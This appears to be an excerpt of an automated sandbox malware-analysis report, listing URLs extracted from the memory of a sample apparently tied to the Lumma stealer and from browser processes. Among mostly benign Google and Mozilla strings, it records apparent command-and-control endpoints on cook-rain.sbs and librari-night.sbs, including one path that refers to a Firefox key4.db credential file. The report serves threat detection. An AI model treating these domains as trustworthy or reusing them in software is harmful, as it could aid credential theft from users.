Source: cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/7
Source: cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2938791730.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/B
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/Ps
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/So4
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/Vux
Source: cfc45d1c7c.exe, 0000000A.00000003.2719178360.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2938791730.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2669358178.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2967887265.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000134E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/api
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000132D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiM
Source: cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiN
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apih
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apipgrou?
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apirviceh
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693505617.00000000013B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/ata%
Source: cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/c
Source: cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/j
Source: cfc45d1c7c.exe, 0000000C.00000003.2967887265.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2976238691.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2965707647.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/k
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/kI
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/nx
Source: cfc45d1c7c.exe, 0000000A.00000003.2748262926.00000000013DA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2748085898.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/ordVPNo
Source: cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/t
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/xM
Source: cfc45d1c7c.exe, 0000000A.00000003.2937966342.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001357000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.0000000001338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs:443/api
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.0000000001338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs:443/apiA
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.0000000001338000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs:443/apix/fqs92o4p.default-release/key4.dbPK
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000010.00000002.2860398543.0000481C02550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2858834589.0000481C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000010.00000002.2859323740.0000481C0251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000010.00000002.2868443298.0000481C0297B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2862619011.0000481C02594000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3097355714.00000208775CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico64
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3366268374.000002087AD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000003.2845753242.0000019953033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3303782792.000002087AA79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hjx
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000010.00000002.2863128847.0000481C0260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2843890389.0000481C0220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000010.00000002.2865803429.0000481C027CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864194681.0000481C026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869381577.0000481C02A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872669893.0000481C02C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000010.00000002.2828247792.0000147800238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000010.00000002.2835363939.0000147800770000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872669893.0000481C02C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000010.00000003.2789271480.00001478006E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000010.00000002.2832735666.0000147800744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/
Source: Lumma111.exe, 00000009.00000003.2584044251.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2590187575.0000000001003000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2584068726.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/3O
Source: Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/api
Source: Lumma111.exe, 00000009.00000003.2584044251.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2590187575.0000000001003000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2584068726.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/aping
